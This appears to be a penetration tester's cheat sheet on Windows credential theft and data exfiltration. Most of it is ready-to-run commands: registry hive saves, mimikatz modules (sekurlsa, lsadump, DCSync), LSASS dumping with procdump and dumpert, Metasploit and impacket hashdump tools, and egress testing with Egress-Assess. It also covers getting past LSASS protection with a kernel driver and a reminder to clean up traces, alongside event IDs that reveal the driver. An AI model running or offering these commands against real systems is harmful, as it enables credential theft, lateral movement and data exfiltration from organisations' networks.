Data Mining - Exfiltration

Exfiltration

https://github.com/FortyNorthSecurity/Egress-Assess
HTTP(S) - DNS - FTP

./Egress-Assess.py --server http[s] --username <username> --password <password>
Invoke-EgressAssess -client http[s] -IP <server-IP/domain> --username <username> -Password <password> -Datatype ssn

Find interesting files

PowerView

Find-InterestingFile -Path \\server\share [-Include keyword1,keyword2] [-OfficeDocs] [-LastAccessTime (Get-Date).AddDays(-7)]

NetNTLMv1 hash of the current user

https://github.com/eladshamir/Internal-Monologue

Credentials

Without admin rights

With admin rights

Windows Credential Management

Thread/Process → Token → Logon Session → Auth Package → Credential (optional)
Network logon (type 3): the client proves it has the credentials but does not send them to the server (creds are not in memory)
Non-network logon (Interactive/NetworkCleartext/…): the client sends credentials to the service (creds are in lsass.exe)

SAM

reg.exe save hklm\sam <C:\temp>
reg.exe save hklm\system <C:\temp>
lsadump::sam
load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump
scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>
Cache

reg.exe save hklm\security <C:\temp>
reg.exe save hklm\system <C:\temp>
lsadump::cache
run post/windows/gather/cachedump
LSASS

LSASS is protected - Mimidrv

https://posts.specterops.io/mimidrv-in-depth-4d273d19e148

If LSASS is protected (Full WinTcb), try to add or remove process protection using Mimidrv. It requires SeLoadDriverPrivilege.

It starts a service using advapi32!ServiceCreate granting access to the service to Everyone group.

Do not forget to clean after yourself -!

Windows Event ID 7045 & 4697 - Service Creation
- Service Name: “mimikatz driver (mimidrv)”
- Service File Name: *\mimidrv.sys
- Service Type: kernel mode driver (0x1)
- Service Start Type: auto start (2)

Event ID 4697 contains information about the account that loaded the driver. Audit Security System Extension must be configured via Group Policy for this event to be generated.

Sysmon Event ID 11 - File Creation
- TargetFilename: *\mimidrv.sys
Sysmon Event ID 6 - Driver Loaded
- ImageLoaded: *\mimidrv.sys
- SignatureStatus: Expired

!+
!processProtect /process:mimikatz.exe

LSASS is not protected

SafetyKatz.exe

Remove banners before compilation: https://github.com/outflanknl/Dumpert
By default: C:\Windows\temp\dumpert.dmp

dumpert.exe
rundll32.exe dumpert.dll,Dump
procdump.exe -accepteula -ma lsass.exe dump.dmp
sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
-----
sekurlsa::logonPasswords full
-----
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)
use post/windows/gather/smart_hashdump
-----
load kiwi
creds_all
wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]
DCSync
lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]